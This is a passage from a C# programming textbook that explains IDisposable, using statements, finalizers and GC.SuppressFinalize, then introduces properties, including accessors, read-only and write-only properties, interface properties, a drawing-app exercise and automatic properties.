applications with classes that consume scarce resources, and unless you take
the necessary steps to provide a means of disposal, the objects that your
applications create might retain their resources until the application finishes.
If the resource is a file, this could prevent other users from being able to
access that file; if the resource is a database connection, your application
Download from finelybook [email protected]
498
could prevent other users from being able to connect to the same database.
Ideally, you want to free resources as soon as you have finished using them
rather than wait for the application to terminate.
In the next exercise, you will implement the IDisposable interface in the
Calculator class and enable the program to finalize Calculator objects at a
time of its choosing.
Implement the IDisposable interface
1. Display the Calculator.cs file in the Code and Text Editor window.
2. Modify the definition of the Calculator class so that it implements the
IDisposable interface, as shown here in bold:
Click here to view code image
class Calculator : IDisposable
{
...
}
3. Add the following method shown in bold, named Dispose, to the end of
the Calculator class. This method is required by the IDisposable
interface:
Click here to view code image
class Calculator : IDisposable
{
...
public void Dispose()
{
Console.WriteLine("Calculator being disposed");
}
}
You would normally add code to the Dispose method that releases the
resources held by the object. There are none in this case and the purpose
of the Console.WriteLine statement in this method is just to let you see
when the Dispose method is run. However, you can see that in a real-
world application, there would likely be some duplication of code
between the destructor and the Dispose method. To remove this
duplication, you would typically place this code in one place and call it
from the other. But because you cannot explicitly invoke a destructor
Download from finelybook [email protected]
499
from the Dispose method, it makes sense instead to call the Dispose
method from the destructor and place the logic that releases resources in
the Dispose method.
4. Modify the destructor so that it calls the Dispose method, as shown in
bold in the following code. (Leave the statement displaying the message
in place in the finalizer so that you can see when it is being run by the
garbage collector).
Click here to view code image
~Calculator()
{
Console.WriteLine("Calculator being finalized");
this.Dispose();
}
When you want to destroy a Calculator object in an application, the
Dispose method does not run automatically; your code must either call it
explicitly (with a statement such as calculator.Dispose()) or create the
Calculator object within a using statement. In your program, you will
adopt the latter approach.
5. Display the Program.cs file in the Code and Text Editor window.
Modify the statements in the Main method that create the Calculator
object and call the Divide method, as shown here in bold:
Click here to view code image
static void Main(string[] args)
{
using (Calculator calculator = new Calculator())
{
Console.WriteLine($"120 / 15 = {calculator.Divide(120,
15)}");
}
Console.WriteLine("Program finishing");
}
6. On the Debug menu, click Start Without Debugging. Verify that the
program now displays the following series of messages:
Click here to view code image
Calculator being created
120 / 15 = 8
Download from finelybook [email protected]
500
Calculator being disposed
Program finishing
Calculator being finalized
Calculator being disposed
The using statement causes the Dispose method to run before the
statement that displays the “Program finishing” message. However, you
can see that the destructor for the Calculator object still runs when the
application finishes, and it calls the Dispose method again. This is
clearly a waste of processing.
7. In the console window, press the Enter key and return to Visual Studio
2017.
Disposing of the resources held by an object more than once might or
might not be disastrous, but it is definitely not good practice. The
recommended approach to resolving this problem is to add a private Boolean
field to the class to indicate whether the Dispose method has already been
invoked, and then examine this field in the Dispose method.
Prevent an object from being disposed of more than once
1. Display the Calculator.cs file in the Code and Text Editor window.
2. Add a private Boolean field called disposed to the start of the Calculator
class. Initialize the value of this field to false, as shown in bold in the
following code:
Click here to view code image
class Calculator : IDisposable
{
private bool disposed = false;
...
}
The purpose of this field is to track the state of this object and indicate
whether the Dispose method has been invoked.
3. Modify the code in the Dispose method to display the message only if
the disposed field is false. After displaying the message, set the disposed
field to true, as shown here in bold:
Click here to view code image
Download from finelybook [email protected]
501
public void Dispose()
{
if (!this.disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
}
4. On the Debug menu, click Start Without Debugging. Notice that the
program displays the following series of messages:
Click here to view code image
Calculator being created
120 / 15 = 8
Calculator being disposed
Program finishing
Calculator being finalized
The Calculator object is now discarded only once, but the destructor is
still running. Again, this is a waste; there is little point in running a
destructor for an object that has already released its resources.
5. In the console window, press the Enter key and return to Visual Studio
2017.
6. In the Calculator class, add the following statement shown in bold to the
end of the Dispose method:
Click here to view code image
public void Dispose()
{
if (!this.disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
GC.SuppressFinalize(this);
}
The GC class provides access to the garbage collector, and it
implements several static methods with which you can control some of
the actions it performs. Using the SuppressFinalize method, you can
indicate that the garbage collector should not perform finalization on the
Download from finelybook [email protected]
502
specified object, and this prevents the destructor from running.
Important The GC class exposes several methods with which you
can configure the garbage collector. However, it is usually better to
let the CLR manage the garbage collector itself because you can
seriously impair the performance of your application if you call
these methods injudiciously. You should treat the SuppressFinalize
method with extreme caution because if you fail to dispose of an
object, you run the risk of losing data (if you fail to close a file
correctly, for example, any data buffered in memory but not yet
written to disk could be lost). Call this method only in situations
such as that shown in this exercise, when you know that an object
has already been discarded.
7. On the Debug menu, click Start Without Debugging. Notice that the
program displays the following series of messages:
Click here to view code image
Calculator being created
120 / 15 = 8
Calculator being disposed
Program finishing
You can see that the destructor is no longer running because the
Calculator object has already been disposed of before the program
finishes.
8. In the console window, press the Enter key and return to Visual Studio
2017.
Thread safety and the Dispose method
The example of using the disposed field to prevent an object from being
discarded multiple times works well in most cases, but keep in mind
that you have no control over when the finalizer runs. In the exercises in
Download from finelybook [email protected]
503
this chapter, it has always executed as the program finishes, but this
might not always be the case—it can run anytime after the last reference
to an object has disappeared. So it is possible that the finalizer might
actually be invoked by the garbage collector on its own thread while the
Dispose method is being run, especially if the Dispose method has to do
a significant amount of work. You could reduce the possibility of
resources being released multiple times by moving the statement that
sets the disposed field to true closer to the start of the Dispose method,
but in this case you run the risk of not freeing the resources at all if an
exception occurs after you have set this variable but before you have
released them.
To eliminate the chances of two concurrent threads disposing of the
same resources in the same object simultaneously, you can write your
code in a thread-safe manner by embedding it in a C# lock statement,
like this:
Click here to view code image
public void Dispose()
{
lock(this)
{
if (!disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
GC.SuppressFinalize(this);
}
}
The purpose of the lock statement is to prevent the same block of
code from being run at the same time on different threads. The
argument to the lock statement (this in the preceding example) should
be a reference to an object. The code between the curly braces defines
the scope of the lock statement. When execution reaches the lock
statement, if the specified object is currently locked, the thread
requesting the lock is blocked, and the code is suspended at this point.
When the thread that currently holds the lock reaches the closing curly
brace of the lock statement, the lock is released, enabling the blocked
thread to acquire the lock itself and continue. However, by the time this
Download from finelybook [email protected]
504
happens, the disposed field will have been set to true, so the second
thread will not attempt to perform the code in the if (!disposed) block.
Using locks in this manner is safe, but it can harm performance. An
alternative approach is to use the strategy described earlier in this
chapter, whereby only the repeated disposal of managed resources is
suppressed. (It is not exception-safe to dispose of managed resources
more than once; you will not compromise the security of your
computer, but you might affect the logical integrity of your application
if you attempt to dispose of a managed object that no longer exists.)
This strategy implements overloaded versions of the Dispose method;
the using statement calls Dispose(), which in turn runs the statement
Dispose(true), while the destructor invokes Dispose(false). Managed
resources are freed only if the parameter to the overloaded version of
the Dispose method is true. For more information, refer back to the
example in the section “Calling the dispose method from a destructor.”
The purpose of the using statement is to ensure that an object is always
discarded, even if an exception occurs while it is being used. In the final
exercise in this chapter, you will verify that this is the case by generating an
exception in the middle of a using block.
Verify that an object is disposed of after an exception
1. Display the Program.cs file in the Code and Text Editor window.
2. Modify the statement that calls the Divide method of the Calculator
object as shown in bold:
Click here to view code image
static void Main(string[] args)
{
using (Calculator calculator = new Calculator())
{
Console.WriteLine($"120 / 0 = {calculator.Divide(120,
0)}");
}
Console.WriteLine("Program finishing");
}
Download from finelybook [email protected]
505
The amended statement attempts to divide 120 by 0.
3. On the Debug menu, click Start Without Debugging.
As you might have anticipated, the application throws an unhandled
DivideByZeroException exception.
4. In the GarbageCollectionDemo message box, click Close program.
Note Sometimes the message box displays the Debug option. If
this occurs, ignore it.
5. Verify that the message “Calculator being disposed” appears after the
unhandled exception in the console window after you close the message
box window.
Download from finelybook [email protected]
506
6. In the console window, press the Enter key and return to Visual Studio
2017.
Summary
In this chapter, you saw how the garbage collector works and how the .NET
Framework uses it to dispose of objects and reclaim memory. You learned
how to write a destructor to clean up the resources used by an object when
memory is recycled by the garbage collector. You also saw how to use the
using statement to implement exception-safe disposal of resources and how
to implement the IDisposable interface to support this form of object
disposal.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 15, “Implementing properties to access
fields.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Write a destructor
Write a method whose name is the same as the
name of the class and is prefixed with a tilde (~).
The method must not have an access modifier
Download from finelybook [email protected]
507
(such as public) and cannot have any parameters
or return a value. For example:
Click here to view code image
class Example
{
~Example()
{
...
}
}
Call a destructor
You can’t call a destructor. Only the garbage
collector can call a destructor.
Force garbage collection
(not recommended)
Call GC.Collect.
Release a resource at a
known point in time (but
at the risk of resource
leaks if an exception
interrupts the execution)
Write a disposal method (a method that disposes
of a resource) and call it explicitly from the
program. For example:
Click here to view code image
class TextReader
{
...
public virtual void Close()
{
...
}
}
class Example
{
void Use()
{
TextReader reader = ...;
// use reader
reader.Close();
}
}
Support exception-safe
disposal in a class
Implement the IDisposable interface. For
example:
Click here to view code image
class SafeResource : IDisposable
Download from finelybook [email protected]
508
{
...
public void Dispose()
{
// Dispose resources here
}
}
Implement exception-
safe disposal for an
object that implements
the IDisposable interface
Create the object in a using statement. For
example:
Click here to view code image
using (SafeResource resource = new
SafeResource())
{
// Use SafeResource here
...
}
Download from finelybook [email protected]
509
PART III
Defining extensible types with C#
Parts I and II introduced you to the core syntax of the C# language and
showed you how to build new types by using structures, enumerations, and
classes. You also saw how the common language runtime (CLR) manages the
memory used by variables and objects when a program runs, and you should
now understand the life cycle of C# objects. The chapters in Part III build on
this information, showing you how to use C# to create extensible components
—highly functional data types that you can reuse in many applications.
In Part III, you’ll learn about more advanced features of C#, such as
properties, indexers, generics, and collection classes. You’ll see how you can
build responsive systems by using events and how you can use delegates to
invoke the application logic of one class from another without closely
coupling the classes—a powerful technique that enables you to construct
highly extensible systems. You will also learn about Language-Integrated
Query (LINQ), which enables you to perform complex queries over
collections of objects in a clear and natural manner. And you’ll see how to
overload operators to customize the way in which common C# operators
function over your own classes and structures.
Download from finelybook [email protected]
510
CHAPTER 15
Implementing properties to access
fields
After completing this chapter, you will be able to:
Encapsulate logical fields by using properties.
Control read access to properties by declaring get accessors.
Control write access to properties by declaring set accessors.
Create interfaces that declare properties.
Implement interfaces containing properties by using structures and
classes.
Generate properties automatically based on field definitions.
Use properties to initialize objects.
This chapter looks at how to define and use properties to encapsulate fields
and data in a class. Previous chapters emphasize that you should make the
fields in a class private and provide methods to store values in them and to
retrieve their values. This approach ensures safe and controlled access to
fields, and you can use it to encapsulate additional logic and rules concerning
the values that are permitted. However, the syntax for accessing a field in this
way is unnatural. When you want to read or write a variable, you normally
use an assignment statement, so calling a method to achieve the same effect
on a field (which is, after all, just a variable) feels a little clumsy. Properties
are designed to alleviate this awkwardness.
Download from finelybook [email protected]
511
Implementing encapsulation by using methods
First, let’s recap the original motivation for using methods to hide fields.
Consider the following structure that represents a position on a computer
screen as a pair of coordinates, x and y. Assume that the range of valid values
for the x-coordinate lies between 0 and 1279, and the range of valid values
for the y-coordinate lies between 0 and 1023.
Click here to view code image
struct ScreenPosition
{
public int X;
public int Y;
public ScreenPosition(int x, int y)
{
this.X = rangeCheckedX(x);
this.Y = rangeCheckedY(y);
}
private static int rangeCheckedX(int x)
{
if (x < 0 || x > 1279)
{
throw new ArgumentOutOfRangeException("X");
}
return x;
}
private static int rangeCheckedY(int y)
{
if (y < 0 || y > 1023)
{
throw new ArgumentOutOfRangeException("Y");
}
return y;
}
}
One problem with this structure is that it does not follow the golden rule
of encapsulation—that is, it does not keep its data private. Public data is often
a bad idea because the class cannot control the values that an application
specifies. For example, the ScreenPosition constructor checks its parameters
to ensure that they are in a specified range, but no such check can be done on
the “raw” access to the public fields. Sooner or later (probably sooner), an
Download from finelybook [email protected]
512
error or misunderstanding on the part of a developer using this class in an
application can cause either X or Y to stray out of this range:
Click here to view code image
ScreenPosition origin = new ScreenPosition(0, 0);
...
int xpos = origin.X;
origin.Y = -100; // oops
The common way to solve this problem is to make the fields private and
add an accessor method and a modifier method to read and write the value of
each private field respectively. The modifier methods can then check the
range for new field values. For example, the code that follows contains an
accessor (GetX) and a modifier (SetX) for the X field. Notice that SetX checks
the parameter passed in.
Click here to view code image
struct ScreenPosition
{
...
public int GetX()
{
return this.x;
}
public void SetX(int newX)
{
this.x = rangeCheckedX(newX);
}
...
private static int rangeCheckedX(int x) { ... }
private static int rangeCheckedY(int y) { ... }
private int x, y;
}
The code now successfully enforces the range constraints, which is good.
However, there is a price to pay for this valuable guarantee—ScreenPosition
no longer has a natural field-like syntax; it uses awkward method-based
syntax instead. The example that follows increases the value of X by 10. To
do so, it has to read the value of X by using the GetX accessor method and
then write the value of X by using the SetX modifier method.
Click here to view code image
int xpos = origin.GetX();
origin.SetX(xpos + 10);
Download from finelybook [email protected]
513
Compare this with the equivalent code if the X field were public:
origin.X += 10;
There is no doubt that, in this case, using public fields is syntactically
cleaner, shorter, and easier. Unfortunately, using public fields breaks
encapsulation. By using properties, you can combine the best of both worlds
(fields and methods) to retain encapsulation while providing a field-like
syntax.
What are properties?
A property is a cross between a field and a method—it looks like a field but
acts as a method. You access a property by using the same syntax that you
use to access a field. However, the compiler automatically translates this
field-like syntax into calls to accessor methods (sometimes referred to as
property getters and property setters).
The syntax for a property declaration looks like this:
Click here to view code image
AccessModifier Type PropertyName
{
get
{
// read accessor code
}
set
{
// write accessor code
}
}
A property can contain two blocks of code, starting with the get and set
keywords. The get block contains statements that execute when the property
is read, and the set block contains statements that run upon writing to the
property. The type of the property specifies the type of data read and written
by the get and set accessors.
The next code example shows the ScreenPosition structure rewritten by
using properties. When looking at this code, notice the following:
Download from finelybook [email protected]
514
Lowercase _x and _y are private fields.
Uppercase X and Y are public properties.
All set accessors are passed the data to be written by using a hidden,
built-in parameter named value.
Click here to view code image
struct ScreenPosition
{
private int _x, _y;
public ScreenPosition(int X, int Y)
{
this._x = rangeCheckedX(X);
this._y = rangeCheckedY(Y);
}
public int X
{
get { return this._x; }
set { this._x = rangeCheckedX(value); }
}
public int Y
{
get { return this._y; }
set { this._y = rangeCheckedY(value); }
}
private static int rangeCheckedX(int x) { ... }
private static int rangeCheckedY(int y) { … }
}
In this example, a private field directly implements each property, but this
is only one way to implement a property. All that is required is for a get
accessor to return a value of the specified type. Such a value can easily be
calculated dynamically rather than being simply retrieved from stored data, in
which case there would be no need for a physical field.
Note Although the examples in this chapter show how to define
properties for a structure, they are equally applicable to classes; the
syntax is the same.
Download from finelybook [email protected]
515
For simple properties, you can use expression-bodied members rather than
full-blown method syntax for get and set accessors. For example, you can
simplify the X and Y properties shown in the previous example like this:
Click here to view code image
public int X
{
get => this._x;
set => this._x = rangeCheckedX(value);
}
public int Y
{
get => this._y;
set => this._y = rangeCheckedY(value);
}
Notice that you don’t need to specify the return keyword for the get
accessor; you simply provide an expression that is evaluated every time the
property is read. This syntax is less verbose and arguably more natural,
although functionally the properties perform the same task. It is a matter of
personal preference which you should use, but for simple properties, I would
recommend adopting the expression-bodied syntax. Of course, you can mix
and match; you could implement a simple get accessor as an expression-
bodied member, but a more complex set accessor could still utilize the
method syntax.
Properties and field names: A warning
The section “Naming variables” in Chapter 2, “Working with variables,
operators, and expressions,” describes some recommendations for
naming variables. In particular, it states that you should avoid starting
an identifier with an underscore. However, you can see that the
ScreenPosition struct does not completely follow this guidance; it
contains fields named _x and _y. There is a good reason for this
anomaly. The sidebar “Naming and accessibility” in Chapter 7,
“Creating and managing classes and objects,” describes how it is
common to use identifiers that start with an uppercase letter for publicly
accessible methods and fields and to use identifiers that start with a
Download from finelybook [email protected]
516
lowercase letter for private methods and fields. Taken together, these
two practices can cause you to give properties and private fields a name
that differs only in the case of the initial letter, and many organizations
do precisely this.
If your organization follows this approach, you should be aware of
one important drawback. Examine the following code, which
implements a class named Employee. The employeeID field is private,
but the EmployeeID property provides public access to this field.
Click here to view code image
class Employee
{
private int employeeID;
public int EmployeeID
{
get => this.EmployeeID;
set => this.EmployeeID = value;
}
}
This code will compile perfectly well, but it results in a program
raising a StackOverflow-Exception exception whenever the EmployeeID
property is accessed. The exception occurs because the get and set
accessors reference the property (uppercase E) rather than the private
field (lowercase e), which causes an endless recursive loop that
eventually causes the process to exhaust the available memory. This
type of bug is very difficult to spot! For this reason, the examples in this
book name the private fields used to provide the data for properties with
a leading underscore; it makes them much easier to distinguish from the
names of properties. All other private fields will continue to use
camelCase identifiers without a leading underscore.
Using properties
When you use a property in an expression, you can use it in a read context
(when you are retrieving its value) and in a write context (when you are
modifying its value). The following example shows how to read values from
Download from finelybook [email protected]
517
the X and Y properties of the ScreenPosition structure:
Click here to view code image
ScreenPosition origin = new ScreenPosition(0, 0);
int xpos = origin.X; // calls origin.X.get
int ypos = origin.Y; // calls origin.Y.get
Notice that you access properties and fields by using identical syntax.
When you use a property in a read context, the compiler automatically
translates your field-like code into a call to the get accessor of that property.
Similarly, if you use a property in a write context, the compiler automatically
translates your field-like code into a call to the set accessor of that property.
Click here to view code image
origin.X = 40; // calls origin.X.set, with value set to 40
origin.Y = 100; // calls origin.Y.Set, with value set to 100
The values being assigned are passed into the set accessors by using the
value variable, as described in the preceding section. The runtime does this
automatically.
It’s also possible to use a property in a read/write context. In this case,
both the get accessor and the set accessor are used. For example, the compiler
automatically translates statements such as the following into calls to the get
and set accessors:
origin.X += 10;
Tip You can declare static properties in the same way that you can
declare static fields and methods. You can access static properties by
using the name of the class or structure rather than an instance of the
class or structure.
Read-only properties
You can declare a property that contains only a get accessor. In this case, you
Download from finelybook [email protected]
518
can use the property only in a read context. For example, here’s the X
property of the ScreenPosition structure declared as a read-only property:
Click here to view code image
struct ScreenPosition
{
private int _x;
...
public int X
{
get => this._x;
}
}
The X property does not contain a set accessor; therefore, any attempt to
use X in a write context will fail, as demonstrated in the following example:
origin.X = 140; // compile-time error
Write-only properties
Similarly, you can declare a property that contains only a set accessor. In this
case, you can use the property only in a write context. For example, here’s
the X property of the ScreenPosition structure declared as a write-only
property:
Click here to view code image
struct ScreenPosition
{
private int _x;
...
public int X
{
set => this._x = rangeCheckedX(value);
}
}
The X property does not contain a get accessor; any attempt to use X in a
read context will fail, as illustrated here:
Click here to view code image
Console.WriteLine(origin.X); // compile-time error
origin.X = 200; // compiles OK
origin.X += 10; // compile-time error
Download from finelybook [email protected]
519
Note Write-only properties are useful for secure data such as
passwords. Ideally, an application that implements security should
allow you to set your password but never allow you to read it back.
When a user attempts to log on, the user can provide the password. The
logon method can compare this password with the stored password and
return only an indication of whether they match.
Property accessibility
You can specify the accessibility of a property (using the keywords public,
private, or protected) when you declare it. However, it is possible within the
property declaration to override the property accessibility for the get and set
accessors. For example, the version of the ScreenPosition structure shown in
the code that follows defines the set accessors of the X and Y properties as
private. (The get accessors are public because the properties are public.)
Click here to view code image
struct ScreenPosition
{
private int _x, _y;
...
public int X
{
get => this._x;
private set => this._x = rangeCheckedX(value);
}
public int Y
{
get => this._y;
private set => this._y = rangeCheckedY(value);
}
...
}
You must observe some rules when defining accessors that have different
accessibility from one another:
Download from finelybook [email protected]
520
You can change the accessibility of only one of the accessors when you
define it. It wouldn’t make much sense to define a property as public
only to change the accessibility of both accessors to private anyway.
The modifier must not specify an accessibility that is less restrictive
than that of the property. For example, if the property is declared to be
private, you cannot specify the read accessor as public. (Instead, you
would make the property public and make the write accessor private.)
Understanding the property restrictions
Properties look, act, and feel like fields when you read or write data by using
them. However, they are not true fields, and certain restrictions apply to
them:
You can assign a value through a property of a structure or class only
after the structure or class has been initialized. The following code
example is illegal because the location variable has not been initialized
(by using new):
Click here to view code image
ScreenPosition location;
location.X = 40; // compile-time error, location not assigned
Note This might seem trivial, but if X were a field rather than a
property, the code would be legal. For this reason, you should define
structures and classes from the beginning by using properties rather than
fields that you later migrate to properties. Code that uses your classes
and structures might no longer work after you change fields into
properties. You will return to this matter in the section “Generating
automatic properties” later in this chapter.
You can’t use a property as a ref or an out argument to a method
(although you can use a writable field as a ref or an out argument). This
Download from finelybook [email protected]
521
makes sense because the property doesn’t really point to a memory
location; rather, it points to an accessor method, such as in the
following example:
Click here to view code image
MyMethod(ref location.X); // compile-time error
A property can contain at most one get accessor and one set accessor.
A property cannot contain other methods, fields, or properties.
The get and set accessors cannot take any parameters. The data being
assigned is passed to the set accessor automatically by using the value
variable.
You can’t declare properties by using const, such as is demonstrated
here:
Click here to view code image
const int X
{
get => ...
set => ...
} // compile-time error
Using properties appropriately
Properties are a powerful feature and used correctly, they can help to
make code easier to understand and maintain. However, they are no
substitute for careful object-oriented design that focuses on the behavior
of objects rather than on the properties of objects. Accessing private
fields through regular methods or through properties does not, by itself,
make your code well designed. For example, a bank account holds a
balance indicating the funds available in the account. You might,
therefore, be tempted to create a Balance property on a BankAccount
class, like this:
Click here to view code image
class BankAccount
{
private decimal _balance;
...
Download from finelybook [email protected]
522
public decimal Balance
{
get => this._balance;
set => this._balance = value;
}
}
This is a poor design because it fails to represent the functionality
required when someone withdraws money from or deposits money into
an account. (If you know of a bank that allows you to change the
balance of your account directly without physically putting money into
the account, please let me know!) When you’re programming, try to
express the problem you’re solving in the solution and don’t get lost in
a mass of low-level syntax. As the following example illustrates,
provide Deposit and Withdraw methods for the BankAccount class
rather than a property setter:
Click here to view code image
class BankAccount
{
private decimal _balance;
...
public decimal Balance { get => this._balance; }
public void Deposit(decimal amount) { ... }
public bool Withdraw(decimal amount) { ... }
}
Declaring interface properties
You encountered interfaces in Chapter 13, “Creating interfaces and defining
abstract classes.” Interfaces can define properties as well as methods. To do
this, you specify the get or set keyword or both, but you replace the body of
the get or set accessor with a semicolon, as shown here:
Click here to view code image
interface IScreenPosition
{
int X { get; set; }
int Y { get; set; }
}
Download from finelybook [email protected]
523
Any class or structure that implements this interface must implement the X
and Y properties with get and set accessor methods (or expression-bodied
members).
Click here to view code image
struct ScreenPosition : IScreenPosition
{
...
public int X
{
get { ... } // or get => ...
set { ... } // or set => ...
}
public int Y
{
get { ... }
set { ... }
}
...
}
If you implement the interface properties in a class, you can declare the
property implementations as virtual, which enables derived classes to
override the implementations.
Click here to view code image
class ScreenPosition : IScreenPosition
{
...
public virtual int X
{
get { ... }
set { ... }
}
public virtual int Y
{
get { ... }
set { ... }
}
...
}
Download from finelybook [email protected]
524
Note This example shows a class. Remember that the virtual keyword is
not valid when creating a struct because structures do not support
inheritance.
You can also choose to implement a property by using the explicit
interface implementation syntax covered in Chapter 13. An explicit
implementation of a property is nonpublic and nonvirtual (and cannot be
overridden).
Click here to view code image
struct ScreenPosition : IScreenPosition
{
...
int IScreenPosition.X
{
get { ... }
set { ... }
}
int IScreenPosition.Y
{
get { ... }
set { ... }
}
...
}
Replacing methods with properties
Chapter 13 teaches you how to create a drawing application with which a
user can place circles and squares on a canvas in a window. In the exercises
in that chapter, you factor the common functionality for the Circle and
Square classes into an abstract class called DrawingShape. The
DrawingShape class provides the SetLocation and SetColor methods, which
the application uses to specify the position and color of a shape on the screen.
In the following exercise, you will modify the DrawingShape class to expose
the location and color of a shape as properties.
Use properties
1. Start Visual Studio 2017 if it is not already running.
Download from finelybook [email protected]
525
2. Open the Drawing solution, which is located in the \Microsoft
Press\VCSBS\Chapter 15\Drawing Using Properties folder in your
Documents folder.
3. Display the DrawingShape.cs file in the Code and Text Editor window.
This file contains the same DrawingShape class that is in Chapter 13
except that, following the recommendations described earlier in this
chapter, the size field has been renamed as _size, and the locX and locY
fields have been renamed as _x and _y.
Click here to view code image
abstract class DrawingShape
{
protected int _size;
protected int _x = 0, _y = 0;
...
}
4. Open the IDraw.cs file for the Drawing project in the Code and Text
Editor window.
This interface specifies the SetLocation method, like this:
Click here to view code image
interface IDraw
{
void SetLocation(int xCoord, int yCoord);
...
}
The purpose of this method is to set the _x and _y fields of the
DrawingShape object to the values passed in. This method can be
replaced with a pair of properties.
5. Delete this method and replace it with the definition of a pair of
properties named X and Y, as shown here in bold:
Click here to view code image
interface IDraw
{
int X { get; set; }
int Y { get; set; }
...
}
Download from finelybook [email protected]
526
6. In the DrawingShape class, delete the SetLocation method and replace it
with the following implementations of the X and Y properties:
Click here to view code image
public int X
{
get => this._x;
set => this._x = value;
}
public int Y
{
get => this._y;
set => this._y = value;
}
7. Display the DrawingPad.xaml.cs file in the Code and Text Editor
window and locate the drawingCanvas_Tapped method.
This method runs when a user taps the screen or clicks the left mouse
button. It draws a square on the screen at the point where the user taps or
clicks.
8. Locate the statement that calls the SetLocation method to set the position
of the square on the screen. It is located in the if statement block as
highlighted in the following:
Click here to view code image
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.SetLocation((int)mouseLocation.X,
(int)mouseLocation.Y);
drawSquare.Draw(drawingCanvas);
}
9. Replace this statement with code that sets the X and Y properties of the
Square object, as shown in bold in the following code:
Click here to view code image
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.X = (int)mouseLocation.X;
drawSquare.Y = (int)mouseLocation.Y;
drawSquare.Draw(drawingCanvas);
Download from finelybook [email protected]
527
}
10. Locate the drawingCanvas_RightTapped method.
This method runs when the user taps and holds a finger on the screen or
clicks the right mouse button. It draws a circle at the location where the
user taps and holds or right-clicks.
11. In this method, replace the statement that calls the SetLocation method
of the Circle object and set the X and Y properties instead, as shown in
bold in the following example:
Click here to view code image
if (myCircle is IDraw)
{
IDraw drawCircle = myCircle;
drawCircle.X = (int)mouseLocation.X;
drawCircle.Y = (int)mouseLocation.Y;
drawCircle.Draw(drawingCanvas);
}
12. Open the IColor.cs file for the Drawing project in the Code and Text
Editor window. This interface specifies the SetColor method, like this:
Click here to view code image
interface IColor
{
void SetColor(Color color);
}
13. Delete this method and replace it with the definition of a property named
Color, as presented here:
Click here to view code image
interface IColor
{
Color Color { set; }
}
This is a write-only property, providing a set accessor but no get
accessor. You define the property this way because the color is not
stored in the DrawingShape class and is specified only as each shape is
drawn; you cannot actually query a shape to find out which color it is.
Download from finelybook [email protected]
528
Note It is common practice for a property to share the same name
as a type (Color in this example).
14. Return to the DrawingShape class in the Code and Text Editor window.
Replace the SetColor method in this class with the Color property
shown here:
Click here to view code image
public Color Color
{
set
{
if (this.shape != null)
{
SolidColorBrush brush = new SolidColorBrush(value);
this.shape.Fill = brush;
}
}
}
Note The code for the set accessor is almost the same as the
original SetColor method except that the statement that creates the
SolidColorBrush object is passed the value parameter.
Additionally, this is an example where the method syntax is more
appropriate than using an expression-bodied member.
15. Return to the DrawingPad.xaml.cs file in the Code and Text Editor
window. In the drawingCanvas_ Tapped method, modify the statement
that sets the color of the Square object to match the following code in
bold:
Click here to view code image
Download from finelybook [email protected]
529
if (mySquare is IColor)
{
IColor colorSquare = mySquare;
colorSquare.Color = Colors.BlueViolet;
}
16. Similarly, in the drawingCanvas_RightTapped method, modify the
statement that sets the color of the Circle object as shown in bold.
Click here to view code image
if (myCircle is IColor)
{
IColor colorCircle = myCircle;
colorCircle.Color = Colors.HotPink;
}
17. On the Debug menu, click Start Debugging to build and run the project.
18. Verify that the application operates in the same manner as before. If you
tap the screen or click the left mouse button on the canvas, the
application should draw a square, and if you tap and hold or click the
right mouse button, the application should draw a circle:
19. Return to the Visual Studio 2017 programming environment and stop
Download from finelybook [email protected]
530
debugging.
Generating automatic properties
As mentioned earlier in this chapter, the principal purpose of properties is to
hide the implementation of fields from the outside world. This is fine if your
properties actually perform some useful work, but if the get and set accessors
simply wrap operations that just read or assign a value to a field, you might
be questioning the value of this approach. However, there are at least two
good reasons why you should define properties rather than expose data as
public fields even in these situations:
Compatibility with applications Fields and properties expose
themselves by using different metadata in assemblies. If you develop a
class and decide to use public fields, any applications that use this class
will reference these items as fields. Although you use the same C#
syntax for reading and writing a field that you use when reading and
writing a property, the compiled code is actually quite different—the
C# compiler just hides the differences from you. If you later decide that
you really do need to change these fields to properties (maybe the
business requirements have changed, and you need to perform
additional logic when assigning values), existing applications will not
be able to use the updated version of the class without being
recompiled. This is awkward if you have deployed the application on a
large number of devices throughout an organization. There are ways
around this, but it is generally better to avoid getting into this situation
in the first place.
Compatibility with interfaces If you are implementing an interface
and the interface defines an item as a property, you must write a
property that matches the specification in the interface, even if the
property just reads and writes data in a private field. You cannot
implement a property simply by exposing a public field with the same
name.
The designers of the C# language recognized that programmers are busy
people who should not have to waste their time writing more code than they
need to. To this end, the C# compiler can generate the code for properties
Download from finelybook [email protected]
531
automatically, like this:
Click here to view code image
class Circle
{
public int Radius{ get; set; }
...
}
In this example, the Circle class contains a property named Radius. Apart
from the type of this property, you have not specified how this property
works—the get and set accessors are empty. The C# compiler converts this
definition to a private field and a default implementation that looks similar to
this:
Click here to view code image
class Circle
{
private int _radius;
public int Radius{
get
{
return this._radius;
}
set
{
this._radius = value;
}
}
...
}
So with very little effort, you can implement a simple property by using
automatically generated code, and if you need to include additional logic
later, you can do so without breaking any existing applications.
Note The syntax for defining an automatic property is almost identical
to the syntax for defining a property in an interface. The exception is
that an automatic property can specify an access modifier such as
private, public, or protected.
Download from finelybook [email protected]
532
You can create a read-only automatic property by omitting the empty set
accessor from your property declaration, like this:
Click here to view code image
class Circle
{
public DateTime CircleCreatedDate { get; }
...
}
This is useful in scenarios where you want to create an immutable
property; a property that is set when the object is constructed and cannot
subsequently be changed. For example, you might want to set the date on
which an object was created or the name of the user who created it, or you
might want to generate a unique identifier value for the object. These are
values that you typically want to set once and then prevent them from being
modified. With this in mind, C# allows you to initialize read-only automatic
properties in one of two ways. You can initialize the property from a
constructor, like this:
Click here to view code image
class Circle
{
public Circle()
{
CircleCreatedDate = DateTime.Now;
}
public DateTime CircleCreatedDate { get; }
...
}
Alternatively, you can initialize the property as part of the declaration, like
this:
Click here to view code image
class Circle
{
public DateTime CircleCreatedDate { get; } = DateTime.Now;
...
}
Download from finelybook [email protected]
533
Be aware that if you initialize a property in this way and also set its value
in a constructor, the value provided by the constructor will overwrite the
value specified by the property initializer; use one approach or the other, but
not both!
Note You cannot create write-only automatic properties. If you attempt
to create an automatic property without a get accessor, you will see a
compile-time error.
